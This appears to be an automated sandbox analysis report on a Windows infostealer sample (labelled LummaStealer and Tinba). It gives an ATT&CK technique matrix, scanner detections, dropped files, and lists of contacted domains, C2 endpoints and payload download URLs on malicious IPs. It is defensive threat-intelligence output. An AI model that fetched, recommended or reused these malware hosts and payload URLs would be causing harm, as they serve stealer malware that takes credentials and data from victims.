Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	1 Scheduled Task/Job	22 Software Packing	NTDS	358 System Information Discovery	Distributed Component Object Model	1 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	111 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Bypass User Account Control	Cached Domain Credentials	981 Security Software Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	471 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	37%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	39%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	39%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://31.41.244.11/files/k4pDgO.ps1	100%	Avira URL Cloud	phishing
http://185.215.113.2065	0%	Avira URL Cloud	safe
https://cl.oud-cdn.de/?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt	0%	Avira URL Cloud	safe
https://marshal-zhukov.com:443/apiicrosoft	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php?V	100%	Avira URL Cloud	malware
https://cl.oud-cdn.de	0%	Avira URL Cloud	safe
http://185.215.113.206i	0%	Avira URL Cloud	safe
https://frogmen-smell.sbs/Cy	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeX	100%	Avira URL Cloud	phishing
https://fadehairucw.store/N	100%	Avira URL Cloud	malware
http://31.41.244.11/files/file1.exeJ	100%	Avira URL Cloud	phishing
http://185.215.113.206I5i	0%	Avira URL Cloud	safe
https://crisiwarny.store/8	100%	Avira URL Cloud	malware
https://marshal-zhukov.com/apiw	0%	Avira URL Cloud	safe
https://marshal-zhukov.com/(	0%	Avira URL Cloud	safe
https://presticitpo.store/h	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpZ	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpX	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpS	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpd	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php/o	100%	Avira URL Cloud	malware
http://185.215.113.16/luma/random.exey	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.phpa	100%	Avira URL Cloud	malware
https://marshal-zhukov.com/apii	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exep	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.php1t#	100%	Avira URL Cloud	malware
https://marshal-zhukov.com/apih	0%	Avira URL Cloud	safe
https://crisiwarny.store:443/apiv	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpr	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php%WpO	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpv	100%	Avira URL Cloud	malware
https://marshal-zhukov.com/apis	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
frogmen-smell.sbs	172.67.174.133	true	true	unknown
cl.oud-cdn.de	176.9.192.202	true	false	unknown
steamcommunity.com	23.210.122.61	true	false	high
plus.l.google.com	216.58.206.46	true	false	high
play.google.com	142.250.186.110	true	false	high
freewaylumma.online	192.64.117.218	true	true	unknown
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.32	true	false	high
www.google.com	142.250.185.196	true	false	high
marshal-zhukov.com	188.114.96.3	true	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
navygenerayk.store	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
presticitpo.store	unknown	unknown	false	high
founpiuer.store	unknown	unknown	false	high
scriptyprefej.store	unknown	unknown	false	high
thumbystriw.store	unknown	unknown	false	high
necklacedmny.store	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high
crisiwarny.store	unknown	unknown	false	high
fadehairucw.store	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	false		high
https://cl.oud-cdn.de/?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt	false	Avira URL Cloud: safe	unknown
https://sb.scorecardresearch.com/b2?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
fadehairucw.store	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false		high
founpiuer.store	false		high
185.215.113.206/c4becf79229cb002.php	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731366393624&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
presticitpo.store	false		high
https://sb.scorecardresearch.com/b?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&a	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english	4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp	file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/ows	skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/k4pDgO.ps1	skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.gstatic.cn/recaptcha/	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store:443/api	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fadehairucw.store/api	4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php?V	skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=_zjj	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com:443/apiicrosoft	4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl	4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvI	4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.2065	4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cl.oud-cdn.de	powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://presticitpo.store:443/api	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/Cy	file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/random.exeX	skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206i	4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl	4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
